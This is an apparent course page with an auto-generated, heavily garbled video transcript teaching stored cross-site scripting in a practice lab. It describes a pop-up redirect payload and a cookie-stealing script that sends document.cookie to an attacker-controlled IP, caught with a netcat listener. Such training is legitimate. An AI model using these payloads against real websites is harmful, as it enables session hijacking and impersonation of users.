Time
4 hours 20 minutes
Difficulty
Intermediate
CEU/CPE
5

Video Description

This video covers exploiting cross site scripting and covers how to exploit XSS manually via redirection and cookie theft as well as how to exploit XSS with BEEF.

Video Transcription

00:04
welcome to cyber ery. I'm Raymond Evans. I will be your subject matter expert for sy Berries. With that pen testing course in this video, we will be discussing exploiting cross site scripting what will be covered. We're gonna talk about how to exploit cross *** scripting manually,
00:20
using redirection and cookie theft and then how to exploit cross site scripting with beef. So how do we explain cross site scripting manually? The same technique that's used identify across the scripting could also be used to exploit it.
00:32
Except some additional steps seem to be taken. First. We decide what kind of attack we want to perform.
00:38
Do you want to redirect the user to a malicious site or you lost some data from home?
00:43
The next we're going to cover across that scripting redirection. First, we're gonna cover cross site scripting redirection, But first you're gonna need an additional B m Gonna need the cross a scripting VM from pen tester labs. So get a pen. Tester labs dot com
00:59
four slash exercise for slash excess underscore and underscore my sequel underscore file.
01:07
That is the VM that we will be using for this one. So how do we exploit Cross I, scripting manually to attempt redirection well, blows a line of code that could be used to call us an unwanted pop up on a vulnerable pull website. So here and this code, we see it's calling image source
01:26
example dot com on error
01:30
window dot open
01:32
google dot com
01:33
excess I with so that that on error window dot open
01:40
that you are all that you put in there.
01:44
He's gonna be the u R l A. It's trying to call,
01:47
and it's gonna have a height and width of 500
01:51
by 500. So let's go check that out. Okay, so here we are in our environment
01:56
and
01:57
we went to Ah, when I get somebody who's viewing this blawg to get re director or at least have a pop up come up, so we're gonna do is
02:06
I'm gonna come in here and, uh, we're gonna
02:08
leave a comment.
02:13
Let's go a title test and we're gonna leave it by a non.
02:20
So here in the text field, we're gonna part of script in here and
02:24
see if it works.
02:28
Look at that ice weasel has prevented a safe from hoping a pop up window,
02:32
See? And this is why it's good af papa blocker just turned on. But for the purposes of this class, we're gonna allow the pop up blockers right now so you can check it out.
02:43
And we're gonna refresh the page here because the
02:46
attack is already on the Beijing stored on there. Right now, we're gonna refresh
02:51
and look at that.
02:53
We
02:54
have a pop up
02:57
now. If this is connected to the Internet, it would've connected to google dot com.
03:01
However, it was not so
03:06
it did not connect. Now, the reason why this worked like it did was because it's trying to pull an image source from this website, but it gets an error trying to pull it from that website.
03:19
So then, on that error, it opens up a window
03:23
and tries to go to google dot com.
03:25
Now
03:28
redirect somebody.
03:30
But
03:30
we showed you before that your cookie
03:35
won't always show up in that in that other box, which shows that in the last video, and
03:39
if you are to try toe pool, the cookie and the pop up
03:46
in this environment would do the same exact thing. You're not gonna get
03:51
that document to populating the problem. However, you can't set the listener to try to get that cookie right back to you. So
04:00
break this line down a bit here that we got. So we have script, new image, that source.
04:05
And so it calls out
04:09
two
04:10
the listeners I p import.
04:12
And when it calls out to it, it's gonna send the document that cookie to that port. So the script script is enclosed. The state includes Is this content as a script new image source?
04:25
It identifies a server to communicate with it, saying, Hey, we're gonna pull new image from this source and then listener I p
04:33
and port four slash beata PHP Do document that cookie. This portion identifies the server the script will communicate with, and we'll send the cookies to that communicator. So here's an example how
04:46
this is being used or new invulnerable field. We will have
04:51
script New image. Source http The i p address of the attacker
04:58
port
04:59
whatever the port is that the Attackers will stay in line
05:01
force I speed up PHP. How did we get data back from this attack? Well,
05:06
nor do that, we're gonna have to set up a listener, so we need a listener. So in your terminal type net Cat Tech L V P 80
05:15
l tells Nakata. Listen, V tells cat neck active verb. Oh, slee print out information received and P doesn't get support to use.
05:25
So let's go set that up real quick. Here we are in our environment.
05:30
So you're gonna take
05:32
that cat
05:33
Tech L V P
05:36
80
05:40
net cats listening on Port 80.
05:43
Next, we're gonna put our script
05:46
that way when I use
05:47
onto the vulnerable one page.
05:49
All right, so here we are on our vulnerable section of the page.
05:55
We have a script, new image source
05:58
and we have our i p address here and Port 80
06:02
and we have our net catalyst already set up. So let's submit the query and see what happens.
06:10
Well, we are pop up because it's stored from last time, so it's close out there.
06:15
I see a pen tester lab's still working here,
06:17
so it's come over here to our listener. Oh, look at that. We got some information back
06:25
so Penn Test Labs is connected to us.
06:30
See? You get request
06:31
the host. We see the user agent so we see what they're coming from.
06:39
Except except except
06:41
were system mystics of information here.
06:44
Played a Continue working here and see if it senses that nice cookie back.
06:56
Try refreshing the page here,
07:02
initiator listener
07:06
And there we go. Now we refresh the page.
07:12
We got the cookie
07:15
from the active user.
07:17
So now this cookie here can be used to imitate the individual on the Web based. So if that person was to be logged in at the time as the admin or as somebody else,
07:28
this cookie here can be used to imitate them, which is very dangerous. So
07:34
there's something that had sense of data all in it. If there's a website, that sense of data on it,
07:41
and it was vulnerable to cross that scripting, an attack like this could be used steel cookie that could imitate an individual
07:47
to get access into the website.

Up Next

Web Application Penetration Testing

In this web application penetration testing course, SME, Raymond Evans, takes you on a wild and fascinating journey into the cyber security discipline of web application pentesting. This is a very hands-on course that will require you to set up your own pentesting environment.

Instructed By

Instructor Profile Image
Raymond Evans
Instructor